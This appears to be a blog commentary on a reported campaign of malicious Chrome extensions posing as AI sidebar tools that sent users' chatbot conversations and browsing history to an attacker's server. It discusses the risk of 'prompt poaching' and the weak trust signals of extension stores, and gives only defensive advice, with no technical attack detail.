According to Dark Reading, a recent campaign involved two malicious Google Chrome extensions posing as legitimate AI tools from a company called AItopia. One extension, “ChatGPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI,” had over 600,000 users and even carried Google’s “Featured” badge, while the other, “AI Sidebar with Deepseek, ChatGPT, Claude and more,” had over 300,000. Researchers from Ox Security found the extensions were exfiltrating complete user conversation data from services like ChatGPT and DeepSeek, along with full browser history, to a command-and-control server. The stolen data included proprietary source code, business strategies, and confidential documents. Although the extensions were live when Ox published its findings just a few weeks ago, both have since been removed from the Chrome Web Store.
The Prompt Poaching Problem
Here’s the thing that gets me: these extensions were brazen. They asked for permission to collect “anonymous, non-identifiable analytics data,” and users just clicked “accept.” But that consent was the cover for stealing everything. Every query, every piece of code pasted into ChatGPT, every internal corporate URL open in a tab—all of it got sent off to some attacker’s server. Researchers have a name for this now: “prompt poaching.” It’s a perfect storm. People are using LLMs for incredibly sensitive work—drafting legal docs, debugging proprietary software, brainstorming business plans—and they’re doing it right in their browser. They don’t think twice about a sidebar extension, especially one Google itself has tagged as “Featured.” That badge creates a dangerous illusion of safety.
Why This Data Is A Goldmine
You might wonder, what’s the point? Sifting through nearly a million users’ random chat logs sounds like a nightmare. But that’s where modern tools come in. As the Ox researcher told Dark Reading, automated code and other LLMs make finding valuable nuggets easier than ever. We’re not just talking about someone’s pizza order. This data has credit card images, cloud account passwords, and API keys that people accidentally paste in. It has the complete browsing history of employees, which is itself a commodity sold for targeted marketing or espionage. Think about it. An attacker gets a trove of data showing exactly what a software engineer at a tech company is searching for, what internal tools they use, and what code problems they’re trying to solve. That’s corporate espionage on a platter. They don’t need to breach the firewall; the user invited the spy right into their workspace.
A Broader Trust Crisis
So what’s the fix? Users are told to avoid extensions from unknown sources. But one of these had a Featured badge! The entire trust model of browser extension stores is showing cracks. This incident is a massive red flag for any organization. Your data security policy might ban ChatGPT at the network level, but if an employee installs a malicious extension, all that sensitive data is leaking out through a side channel anyway. It fundamentally changes the attack surface. The Ox Security blog recommends immediate removal of these specific extensions, but the lesson is bigger. We have to treat browser extensions with the same suspicion we treat random .exe files. They have profound, deep access. And in an industrial or corporate setting, that access can expose critical operational data. It underscores why securing the endpoint—the actual machine where work is done—is so crucial, whether it’s an office laptop or a hardened industrial panel PC on a factory floor. The principle is the same: the interface is a vulnerability.
The New Normal For AI Security
Basically, this is the new normal. As AI tools become workflow staples, they become giant, juicy targets. Threat actors are innovating right alongside the tech they’re exploiting. “Prompt poaching” won’t be the last clever term we hear. The scary part is the objective wasn’t even clear. Was it for direct financial theft? Corporate spying? Or just to amass a huge dataset to sell in chunks on the dark web? Probably all of the above. The takeaway is painfully simple: be paranoid about what you install, even—maybe especially—from official stores. And assume anything you type into an AI, or any tab you have open, could be watched if you’ve let the wrong tool into your browser. That’s the price of this incredible convenience.
